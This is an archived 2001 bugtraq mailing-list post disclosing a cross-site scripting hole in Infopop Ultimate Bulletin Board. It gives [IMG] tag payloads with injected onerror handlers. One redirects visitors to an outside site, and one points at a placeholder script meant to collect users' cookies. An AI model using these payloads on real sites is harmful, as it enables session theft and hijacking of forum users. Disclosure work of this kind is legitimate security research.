[23155] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

UBB vulnerablietis + about: using example

daemon@ATHENA.MIT.EDU (kyprizel)
Thu Nov 15 17:02:27 2001

Date: Fri, 16 Nov 2001 02:10:50 +0700
From: kyprizel <kyprizel@hostel.tusur.ru>
Reply-To: kyprizel <kyprizel@hostel.tusur.ru>
Message-ID: <15722392656.20011116021050@hostel.tusur.ru>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit

Здравствуйте, уважаемый(ая) bugtraq,
  Posting something like this UBB tag:
  [IMG]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';[/IMG]
  to Infopop Ultimate Bulletin
  Board, we are able to redirect users browser to http://punk.tomsk.ru
  There are many ways to stole cookies using this vulnerabliety, one
  of them:
  [IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';[/IMG]
   and yourscript.php - is a script to recieve users cookies 8)
  
  


  --
 // Э.Заитов AKA kyprizel                        mailto:kyprizel@hostel.tusur.ru
                                                 ICQ#3337333
  --
 "Knowlege itself is power..."
  F.Bacon
  --


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[23155] in bugtraq

UBB vulnerablietis + about: using example

daemon@ATHENA.MIT.EDU (kyprizel)Thu Nov 15 17:02:27 2001

daemon@ATHENA.MIT.EDU (kyprizel)
Thu Nov 15 17:02:27 2001